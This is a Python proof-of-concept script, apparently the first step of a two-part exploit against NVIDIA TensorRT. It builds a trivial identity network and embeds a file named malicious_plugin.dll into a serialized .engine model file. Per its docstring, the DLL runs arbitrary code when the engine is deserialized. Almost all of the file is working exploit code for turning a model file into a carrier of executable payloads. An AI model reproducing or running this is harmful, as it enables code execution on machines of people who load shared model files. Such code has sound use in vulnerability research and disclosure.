| """ |
| TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL. |
| |
| This script: |
| 1. Creates a simple identity network using TensorRT's network API |
| 2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize |
| 3. Saves the resulting .engine file |
| |
| The .engine file will contain the embedded DLL that executes arbitrary code |
| when deserialized by TensorRT. |
| """ |
|
|
| import os |
| import sys |
| import tensorrt as trt |
|
|
def _build_identity_network(builder):
    """Create a single-layer identity network on *builder*.

    The network has one float32 input named "input" with shape
    (1, 3, 32, 32), fed through an identity layer whose output is renamed
    "output" and marked as the network output.

    Returns:
        The populated network definition, or None if
        ``builder.create_network`` returned None.
    """
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    if network is None:
        return None
    input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
    identity = network.add_identity(input_tensor)
    identity.get_output(0).name = "output"
    network.mark_output(identity.get_output(0))
    return network


def _make_config(builder, plugin_dll):
    """Create a builder config with a 1 MiB workspace pool.

    *plugin_dll* is set as the only entry of ``plugins_to_serialize``.
    """
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)
    config.plugins_to_serialize = [plugin_dll]
    return config


def build_malicious_engine():
    """Build the PoC engine and write it next to this script.

    Reads ``malicious_plugin.dll`` from this script's directory, builds an
    identity network whose builder config lists that DLL in
    ``plugins_to_serialize``, and writes the serialized engine to
    ``malicious_model.engine`` in the same directory. If the first build
    fails, the DLL is loaded through the builder's plugin registry and the
    build is retried once with a fresh builder, network and config.

    Returns:
        True if the engine file was written; False on any failure (an
        ``ERROR:`` line is printed before returning False).
    """
    here = os.path.dirname(__file__)
    plugin_dll = os.path.join(here, "malicious_plugin.dll")
    engine_file = os.path.join(here, "malicious_model.engine")

    if not os.path.exists(plugin_dll):
        print(f"ERROR: Plugin DLL not found: {plugin_dll}")
        return False

    logger = trt.Logger(trt.Logger.VERBOSE)

    builder = trt.Builder(logger)
    if builder is None:
        print("ERROR: Failed to create builder")
        return False

    print(f"[*] Plugin DLL: {plugin_dll} ({os.path.getsize(plugin_dll)} bytes)")

    network = _build_identity_network(builder)
    if network is None:
        print("ERROR: Failed to create network")
        return False
    print("[*] Simple identity network created")

    print(f"[*] Setting plugins_to_serialize: {plugin_dll}")
    config = _make_config(builder, plugin_dll)

    print("[*] Building engine (this may take a moment)...")
    serialized_engine = builder.build_serialized_network(network, config)
    if serialized_engine is None:
        print("ERROR: Failed to build serialized engine")
        print("[*] Trying approach 2: load_library first, then serialize...")

        # Fallback: register the library with the plugin registry first.
        # NOTE(review): load_library presumably loads the DLL into the
        # current process, so any code it runs on load also runs on the
        # build host - confirm this is intended.
        registry = builder.get_plugin_registry()
        handle = registry.load_library(plugin_dll)
        print(f"[*] load_library result: {handle}")

        # Retry with a brand-new builder, network and config; the same
        # None checks as the first attempt apply.
        builder2 = trt.Builder(logger)
        if builder2 is None:
            print("ERROR: Failed to create builder")
            return False
        network2 = _build_identity_network(builder2)
        if network2 is None:
            print("ERROR: Failed to create network")
            return False
        config2 = _make_config(builder2, plugin_dll)

        serialized_engine = builder2.build_serialized_network(network2, config2)
        if serialized_engine is None:
            print("ERROR: Still failed to build engine")
            return False

    engine_size = serialized_engine.nbytes
    print(f"[+] Engine built successfully! Size: {engine_size} bytes")

    # Size comparison is only a rough heuristic: it does not verify that the
    # DLL bytes are actually present inside the serialized engine.
    dll_size = os.path.getsize(plugin_dll)
    print(f"[*] Plugin DLL size: {dll_size} bytes")
    if engine_size > dll_size:
        print("[+] Engine is larger than DLL - DLL likely embedded!")
    else:
        print("[-] Engine seems too small - DLL might not be embedded")

    with open(engine_file, "wb") as f:
        f.write(bytes(serialized_engine))
    print(f"[+] Malicious engine saved to: {engine_file}")

    return True
|
|
|
|
if __name__ == "__main__":
    # Delete any PWNED.txt left over from a previous run (presumably the
    # marker written by the loader step) so stale output is not mistaken
    # for a fresh result.
    stale_marker = os.path.join(os.path.dirname(__file__), "PWNED.txt")
    if os.path.exists(stale_marker):
        os.remove(stale_marker)

    ok = build_malicious_engine()
    if not ok:
        print("\n[-] STEP 1 FAILED")
        sys.exit(1)

    print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
    print("[*] Next: Run load_malicious_engine.py to test ACE")
    sys.exit(0)
|
|